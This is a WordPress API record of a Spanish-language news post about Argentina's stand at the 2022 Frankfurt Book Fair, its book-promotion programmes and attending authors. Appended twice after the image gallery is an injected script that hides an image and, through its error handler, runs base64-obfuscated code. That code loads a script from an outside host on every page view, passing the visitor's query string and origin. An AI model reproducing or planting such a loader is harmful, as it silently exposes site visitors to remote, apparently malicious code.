{"id":1644,"date":"2022-10-20T10:58:23","date_gmt":"2022-10-20T13:58:23","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1644"},"modified":"2025-08-14T00:32:43","modified_gmt":"2025-08-14T03:32:43","slug":"argentina-se-presenta-en-la-feria-internacional-del-libro-de-frankfurt","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1644","title":{"rendered":"Argentina se presenta en la Feria Internacional del Libro de Frankfurt"},"content":{"rendered":"\n<h5 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>En la ciudad de Frankfurt, Alemania, se llev\u00f3 a cabo hoy la\u00a0<strong>inauguraci\u00f3n del stand argentino en la Feria Internacional del Libro de Frankfurt<\/strong>. Esta feria, que este mi\u00e9rcoles celebra el\u00a0<strong>D\u00eda del Libro Argentino<\/strong>, es el mayor evento comercial del mundo en t\u00e9rminos de representaci\u00f3n editorial y se desarrollar\u00e1 del 19 al 23 de octubre.<\/em><\/h5>\n\n\n\n<p>L<strong>a Canciller\u00eda argentina, en su stand de m\u00e1s de 100 m\u00b2, presenta una importante muestra de libros que corresponden a los programas e iniciativas que forman parte del Plan Libro Argentino<\/strong>, pol\u00edtica p\u00fablica impulsada por la Direcci\u00f3n de Asuntos Culturales, junto a la Direcci\u00f3n Nacional de Turismo, Deportes, Industrias Culturales y Creativas y Servicios Basados en el Conocimiento, y la Agencia Argentina de Inversiones y Comercio Internacional del Ministerio de Relaciones Exteriores, Comercio Internacional y Culto.<\/p>\n\n\n\n<p>Paula V\u00e1zquez, directora de Asuntos Culturales, explic\u00f3 que la presencia en este tipo de eventos busca<strong>&nbsp;la internacionalizaci\u00f3n del mercado editorial nacional a partir del impulso de las publicaciones y de sus autores y autoras en el exterior<\/strong>. Agreg\u00f3 que \u201cesta proyecci\u00f3n persigue, adem\u00e1s, el desarrollo econ\u00f3mico exportador y la profesionalizaci\u00f3n de medianas y peque\u00f1as editoriales, tanto en relaci\u00f3n al mercado de derechos como al libro f\u00edsico\u201d.<\/p>\n\n\n\n<p><strong>El sector editorial comercial (SEC) comprende a las empresas cuya principal actividad econ\u00f3mica es la edici\u00f3n de libros que se comercializan en canales exclusivos para libros (librer\u00edas, distribuidores y canales directos). Acorde a un Informe de Producci\u00f3n del Libro Argentino, en 2021, se observ\u00f3 un crecimiento en la cantidad de empresas participantes en el SEC, alcanzando las 347 razones sociales, que en conjunto editaron 11.603 novedades. En este mismo per\u00edodo, el comercio exterior del libro mostr\u00f3 una leve recuperaci\u00f3n con ventas externas por US$ 21,3 millones contra US$ 18 millones en 2020.<\/strong><\/p>\n\n\n\n<p><strong>En el stand de Argentina se pueden encontrar los 300 libros que corresponden a la curadur\u00eda Argentina Bibliodiversa<\/strong>, un cat\u00e1logo elaborado a partir de una convocatoria abierta de la que participaron m\u00e1s de 100 editoriales y realizada especialmente para las ferias internacionales de Frankfurt y Guadalajara. Este cat\u00e1logo, que est\u00e1 disponible de manera f\u00edsica en el stand y en su versi\u00f3n digital en la p\u00e1gina web de canciller\u00eda, exhibe la diversidad de nuestra industria editorial y la calidad de sus contenidos en distintos ejes: Literatura y diversidad, G\u00e9neros m\u00faltiples, Ediciones universitarias y Traducciones argentinas.<\/p>\n\n\n\n<p>Tambi\u00e9n, el stand alberga una selecci\u00f3n de libros del&nbsp;<strong>Programa Sur<\/strong>, una iniciativa que brinda apoyo econ\u00f3mico para la traducci\u00f3n de obras argentinas a otras lenguas; el cat\u00e1logo<strong>&nbsp;Argentina Key Titles<\/strong>, una selecci\u00f3n de 28 t\u00edtulos argentinos creado con el objetivo de promover la venta de derechos; y una vitrina dedicada<strong>&nbsp;autoras y autores premiados, con una selecci\u00f3n de 30 escritoras y escritores<\/strong>&nbsp;que recibieron importantes reconocimientos internacionales.<\/p>\n\n\n\n<p>Por otro lado, se destaca la presencia en Frankfurt d<strong>el escritor Luis Gusman y la escritora Laura Wittner<\/strong>, quienes el s\u00e1bado 22 de octubre, representar\u00e1n a Argentina en las mesas \u201cDesaf\u00edos culturales en Am\u00e9rica Latina (Chile, Brasil y Argentina)\u201d y \u201cLost and found in translation: panhispanismo y traducci\u00f3n\u201d, respectivamente.&nbsp;<strong>Ambos autores contaron con el apoyo de la Canciller\u00eda para su traslado, as\u00ed como tambi\u00e9n lo recibieron las editoriales&nbsp;<\/strong>Corregidor, Calibroscopio, Lecturita, Iamiqu\u00e9 y Didot, que se suman a Colisi\u00f3n Libros, Edhasa, Journal, Eudeba, Libros del Zorzal que estar\u00e1n presentes en el stand de nuestro pa\u00eds.<\/p>\n\n\n\n<p>El cat\u00e1logo Argentina Bibliodiversa se puede encontrar en:&nbsp;<a href=\"https:\/\/cancilleria.gob.ar\/userfiles\/2022\/argentina-bibliodiversa.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/cancilleria.gob.ar\/userfiles\/2022\/argentina-bibliodiversa.pdf<\/a><\/p>\n\n\n\n<p>M\u00e1s informaci\u00f3n sobre el Plan Libro Argentino, Argentina Bibliodiversa, Programa SUR y Argentina Key Titles en:&nbsp;&nbsp;<a href=\"https:\/\/www.cancilleria.gob.ar\/libro-argentino\">https:\/\/www.cancilleria.gob.ar\/libro-argentino<\/a><\/p>\n\n\n\n<p><strong>Cristina Witt<\/strong>, Directora de Colisi\u00f3n Libros, destac\u00f3:&nbsp;<strong>\u00abPara la literatura argentina, con tantos talentos que aguardan ser le\u00eddos y a la vez tantos lectores ansiosos de leerlos, la oportunidad de compartir un excepcional espacio de libros, acaso el m\u00e1s importante del mundo, que re\u00fane en un ampl\u00edsimo espectro la gran producci\u00f3n de literatura universal, tiene un valor en extremo significativo. Porque nos permite promover la propia, crear lazos y cristalizar ideas y proyectos que los sostengan y los multipliquen\u00bb.<\/strong><\/p>\n\n\n\n<p>\u00abNosotros hace muchos a\u00f1os que venimos trabajando con la Canciller\u00eda y la Agencia Argentina de Inversiones y Comercio Internacional en la promoci\u00f3n y la internacionalizaci\u00f3n de la industria editorial, con actividades en nuestra propia feria &#8211; la Feria Internacional del Libro de Buenos Aires- y participando en las distintas ferias internacionales, como as\u00ed tambi\u00e9n colaborando con el programa Sur y el programa Argentina Key Titles\u00bb, expres\u00f3&nbsp;<strong>Jorge Guti\u00e9rrez Brianza, Director Comercial y de Operaciones de Fundaci\u00f3n El Libro<\/strong>.<\/p>\n\n\n\n<p>Seg\u00fan destaca Brianza, el trabajo de la Fundaci\u00f3n El Libro \u00abconsiste en dar a conocer la industria argentina, su bibliodiversidad, oferta editorial y calidad, y tambi\u00e9n en generar y tender puentes para que editores de otros pa\u00edses visiten nuestra feria, tomen contacto con editores argentinos y concreten negocios, como compra y venta de libros f\u00edsicos, compra y venta de derechos, coediciones y otras actividades\u00bb.<\/p>\n\n\n\n<p><strong>La Feria Internacional del Libro de Frankfurt es una de las m\u00e1s reconocidas a nivel internacional. La edici\u00f3n 2021 cont\u00f3 con m\u00e1s de 73.500 visitantes, de los cuales 36.000 fueron profesionales de 105 pa\u00edses. Un total de 2.013 compa\u00f1\u00edas estuvieron representadas en los pabellones, as\u00ed como tambi\u00e9n hubo numerosos expositores digitales.<\/strong><\/p>\n\n\n\n<h4 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\"><em>Galer\u00eda de Im\u00e1genes:<\/em><\/h4>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1647\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt-1024x768.jpg\" alt=\"\" class=\"wp-image-1647\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt-265x198.jpg 265w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"1011\" data-id=\"1646\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt_2022-1024x1011.jpg\" alt=\"\" class=\"wp-image-1646\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt_2022-1024x1011.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt_2022-300x296.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt_2022-768x758.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt_2022-696x687.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt_2022-1068x1054.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt_2022-426x420.jpg 426w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_del_libro_de_frankfurt_2022.jpg 1216w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"1648\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_frankfurt-768x1024.jpg\" alt=\"\" class=\"wp-image-1648\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_frankfurt-768x1024.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_frankfurt-225x300.jpg 225w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_frankfurt-696x928.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_frankfurt-315x420.jpg 315w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_frankfurt.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"659\" data-id=\"1645\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_internacional_del_libro_de_frankfurt_0-1024x659.jpg\" alt=\"\" class=\"wp-image-1645\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_internacional_del_libro_de_frankfurt_0-1024x659.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_internacional_del_libro_de_frankfurt_0-300x193.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_internacional_del_libro_de_frankfurt_0-768x494.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_internacional_del_libro_de_frankfurt_0-696x448.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_internacional_del_libro_de_frankfurt_0-1068x688.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_internacional_del_libro_de_frankfurt_0-652x420.jpg 652w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_internacional_del_libro_de_frankfurt_0.jpg 1255w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1649\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt-1024x768.jpg\" alt=\"\" class=\"wp-image-1649\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt-265x198.jpg 265w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1650\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022-1024x768.jpg\" alt=\"\" class=\"wp-image-1650\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022-265x198.jpg 265w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/feria_libro_de_frankfurt_2022.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En la ciudad de Frankfurt, Alemania, se llev\u00f3 a cabo hoy la\u00a0inauguraci\u00f3n del stand argentino en la Feria Internacional del Libro de Frankfurt. Esta feria, que este mi\u00e9rcoles celebra el\u00a0D\u00eda del Libro Argentino, es el mayor evento comercial del mundo en t\u00e9rminos de representaci\u00f3n editorial y se desarrollar\u00e1 del 19 al 23 de octubre. La [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1651,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26,16,22],"tags":[],"class_list":{"0":"post-1644","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales","9":"category-ferias-y-congresos","10":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1644"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1644"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1644\/revisions"}],"predecessor-version":[{"id":7311,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1644\/revisions\/7311"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1651"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1644"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1644"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1644"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}